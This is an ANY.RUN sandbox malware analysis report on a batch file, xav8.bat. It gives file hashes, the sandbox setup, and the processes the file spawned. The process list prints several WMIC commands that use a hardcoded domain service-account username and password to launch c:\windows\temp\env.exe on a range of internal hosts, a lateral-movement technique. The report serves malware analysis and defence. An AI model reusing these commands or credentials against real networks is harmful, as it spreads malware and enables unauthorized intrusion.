Malware analysis xav8.bat Malicious activity | ANY.RUN

Add for printing

File name:	xav8.bat
Full analysis:	https://app.any.run/tasks/30af000c-efa4-4875-92b1-41c3eb377f14
Verdict:	Malicious activity
Analysis date:	September 18, 2019, 18:52:19
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME:	text/plain
File info:	ASCII text, with CRLF line terminators
MD5:	FF0CE8CBCD276AF352F3D0B4263D18AD
SHA1:	415D931B5F097E53CB1C7BF46BDFCE0C8F3A6A52
SHA256:	DDF4385480816035B8FB06964A36666B8DFAAC6A1584990B1AD9444D0A8E5AA8
SSDEEP:	192:kYlifMZmXzEBu7Ylif264bISOJPaWo17pePfYdLdOn0gj1nNJW869GCFpjMi7E33:WP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (75.0.3770.100)
Google Update Helper (1.3.34.7)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.2 (4.7.03062)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB4019990
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
No malicious indicators.
SUSPICIOUS
- Uses WMIC.EXE to create a new process
  - cmd.exe (PID: 3028)
INFO
No info indicators.

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

233

Monitored processes

101

Malicious processes

1

Suspicious processes

0

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
3028	cmd /c ""C:\Users\admin\AppData\Local\Temp\xav8.bat" "	C:\Windows\system32\cmd.exe	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3864	wmic /node:"10.158.10.243" /user:"klasj\ex2010_svc" /password:"4Success!!!" process call create "cmd.exe /c c:\windows\temp\env.exe"	C:\Windows\System32\Wbem\WMIC.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147944122 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3976	wmic /node:"10.158.10.244" /user:"klasj\ex2010_svc" /password:"4Success!!!" process call create "cmd.exe /c c:\windows\temp\env.exe"	C:\Windows\System32\Wbem\WMIC.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147944122 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2184	wmic /node:"10.158.10.245" /user:"klasj\ex2010_svc" /password:"4Success!!!" process call create "cmd.exe /c c:\windows\temp\env.exe"	C:\Windows\System32\Wbem\WMIC.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147944122 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2592	wmic /node:"10.158.10.246" /user:"klasj\ex2010_svc" /password:"4Success!!!" process call create "cmd.exe /c c:\windows\temp\env.exe"	C:\Windows\System32\Wbem\WMIC.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147944122 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2936	wmic /node:"10.158.10.247" /user:"klasj\ex2010_svc" /password:"4Success!!!" process call create "cmd.exe /c c:\windows\temp\env.exe"	C:\Windows\System32\Wbem\WMIC.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147944122 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3052	wmic /node:"10.158.10.248" /user:"klasj\ex2010_svc" /password:"4Success!!!" process call create "cmd.exe /c c:\windows\temp\env.exe"	C:\Windows\System32\Wbem\WMIC.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147944122 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3180	wmic /node:"10.158.10.249" /user:"klasj\ex2010_svc" /password:"4Success!!!" process call create "cmd.exe /c c:\windows\temp\env.exe"	C:\Windows\System32\Wbem\WMIC.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147944122 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3328	wmic /node:"10.158.10.251" /user:"klasj\ex2010_svc" /password:"4Success!!!" process call create "cmd.exe /c c:\windows\temp\env.exe"	C:\Windows\System32\Wbem\WMIC.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147944122 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3572	wmic /node:"10.158.10.255" /user:"klasj\ex2010_svc" /password:"4Success!!!" process call create "cmd.exe /c c:\windows\temp\env.exe"	C:\Windows\System32\Wbem\WMIC.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147944122 Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Add for printing

Total events

1 906

Read events

1 906

Write events

0

Delete events

0

Modification events

No data

Add for printing

Executable files

0

Suspicious files

0

Text files

0

Unknown types

0

Dropped files

No data

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

0

TCP/UDP connections

199

DNS requests

0

Threats

0

HTTP requests

No HTTP requests

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	10.158.10.244:137	—	—	—	unknown
—	—	10.158.10.245:137	—	—	—	unknown
—	—	10.158.10.243:137	—	—	—	unknown
—	—	10.158.10.246:137	—	—	—	unknown
—	—	10.158.10.249:137	—	—	—	unknown
—	—	10.158.10.248:137	—	—	—	unknown
—	—	10.158.10.247:137	—	—	—	unknown
—	—	10.158.10.243:135	—	—	—	unknown
—	—	10.158.11.11:137	—	—	—	unknown
—	—	10.158.10.244:135	—	—	—	unknown

DNS requests

No data

Threats

PID	Process	Class	Message
—	—	Misc activity	ET SCAN Behavioral Unusual Port 135 traffic Potential Scan or Infection

Add for printing

No debug info

General Info

xav8.bat

FF0CE8CBCD276AF352F3D0B4263D18AD

415D931B5F097E53CB1C7BF46BDFCE0C8F3A6A52

DDF4385480816035B8FB06964A36666B8DFAAC6A1584990B1AD9444D0A8E5AA8

192:kYlifMZmXzEBu7Ylif264bISOJPaWo17pePfYdLdOn0gj1nNJW869GCFpjMi7E33:WP

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

SUSPICIOUS

Uses WMIC.EXE to create a new process

INFO

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings